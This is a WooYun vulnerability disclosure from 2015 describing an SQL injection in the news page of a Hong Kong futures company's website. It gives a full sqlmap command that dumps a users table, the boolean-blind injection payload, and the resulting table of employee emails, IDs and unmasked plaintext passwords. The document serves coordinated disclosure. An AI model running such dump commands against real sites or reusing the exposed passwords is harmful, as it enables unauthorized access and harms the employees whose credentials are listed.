当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0146085

漏洞标题:中国迈科国际期货有限公司(香港公司)某处存在SQL注入漏洞(泄露员工邮箱,id及明文密码)(香港地區)

相关厂商:中国迈科国际期货有限公司

漏洞作者: 路人甲

提交时间:2015-10-12 11:55

修复时间:2015-11-29 17:58

公开时间:2015-11-29 17:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-12: 细节已通知厂商并且等待厂商处理中
2015-10-15: 厂商已经确认,细节仅向厂商公开
2015-10-25: 细节向核心白帽子及相关领域专家公开
2015-11-04: 细节向普通白帽子公开
2015-11-14: 细节向实习白帽子公开
2015-11-29: 细节向公众公开

简要描述:

中国迈科期货国际有限公司(“迈科期货国际”)是受香港证监会(SFC)监管的期货交易公司,中央编号为AYB226。公司获得香港证监会发牌许可,可经营法规允许内的香港及国际期货与期权的交易及风险管理业务。西安迈科金属国际集团有限公司(“迈科金属集团”)是中国迈科期货国际有限公司的控股股东。
公司具备严格内部监控系统及雄厚的股东背景,拥有经验丰富的专业人才,熟悉全球期货市场的运作,具有独创精神,竭尽所能为投资者提供优质迅捷的全球期货期权交易和信息服务,为企业和行业提供全方位的套期保值和风险管理服务。公司秉承集团公司 “发现价值,创造价值,分享价值”的经营理念,倡导“诚信、创新、务实、高效、卓越及兼容并蓄”的企业文化,坚持合规经营、稳健发展,旨在为客户创造价值,共享全球投资机会。

详细说明:

使用sqlmap进行测试:
测试地址:http://**.**.**.**/news/show.asp?id=2605

python sqlmap.py -u "http://**.**.**.**/news/show.asp?id=2605" -p id --technique=B --random-agent -T users -C email,id,pass,passwd,userid --dump --threads=10

漏洞证明:

--
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2605 AND 2841=2841
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
Table: admin
[10 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| classid | numeric |
| email | non-numeric |
| id | numeric |
| msn | non-numeric |
| pass | numeric |
| qq | non-numeric |
| title | non-numeric |
| userid | non-numeric |
| username | non-numeric |
| zip | non-numeric |
+----------+-------------+


Database: Microsoft_Access_masterdb
[7 tables]
+--------+
| admin |
| banner |
| city |
| config |
| info |
| news |
| users |
+--------+


back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
Table: users
[10 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| address | non-numeric |
| classid | numeric |
| company | non-numeric |
| email | non-numeric |
| homepage | non-numeric |
| id | numeric |
| pass | numeric |
| passwd | non-numeric |
| title | non-numeric |
| userid | non-numeric |
+----------+-------------+


Database: Microsoft_Access_masterdb
Table: users
[13 entries]
+---------+-----------------------+--------------------+---------+----------+-----+------+--------------+--------+
| classid | email | company | address | homepage | id | pass | passwd | userid |
+---------+-----------------------+--------------------+---------+----------+-----+------+--------------+--------+
| 5 | dfgdf@.**.**.**.** | qqqqqq | qq | <blank> | 617 | 1 | CHINACGF2012 | qqq |
| 5 | edmund@**.**.**.** | f\x0e\\\x0fQ\\?b2 | <blank> | <blank> | 627 | 1 | 8001CGF1610 | 8001 |
| 5 | xxy1970@**.**.**.** | R\x18Pe | <blank> | <blank> | 628 | 1 | 8038cgf1619 | 8038 |
| 5 | zswr1818@**.**.**.** | Y\x0fU\\?84l\\?e2 | <blank> | <blank> | 629 | 1 | 8048CGF7913 | 8048 |
| 5 | cs@**.**.**.** | g\\?97Q\\?8dv\\?db | <blank> | <blank> | 630 | 1 | 8088cgf0099 | 8088 |
| 5 | nbhltz@**.**.**.** | l\\?88l8gp | <blank> | <blank> | 631 | 1 | 8812cgf6716 | 8812 |
| 5 | pkusong@**.**.**.** | [\\?8bO\\?cay\\?c0 | <blank> | <blank> | 632 | 1 | 8028cgf4332 | 8028 |
| 5 | lixiaodong@**.**.**.** | gN\\\x0fN\x1c | <blank> | <blank> | 633 | 1 | 8098cgf7195 | 8098 |
| 5 | weicf169@**.**.**.** | ?f%? | <blank> | <blank> | 634 | 1 | 8002cgf3675 | 8002 |
| 5 | majie515@**.**.**.** | majie | <blank> | <blank> | 635 | 1 | 8168cgf0000 | 8168 |
| 5 | ndzxg@**.**.**.** | g1[fR\x1a | <blank> | <blank> | 636 | 1 | 8078cgf6814 | 8078 |
| 5 | xxy1970@**.**.**.** | R\x18Pe | <blank> | <blank> | 637 | 1 | 8038cgf1619 | 8038 |
| 5 | 593291320@**.**.**.** | ^\\?94m\\?9b | <blank> | <blank> | 640 | 1 | 8168CGF4516 | 8168 |
+---------+-----------------------+--------------------+---------+----------+-----+------+--------------+--------+

修复方案:

增加过滤。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2015-10-15 17:57

厂商回复:

已聯絡相關機構處理

最新状态:

暂无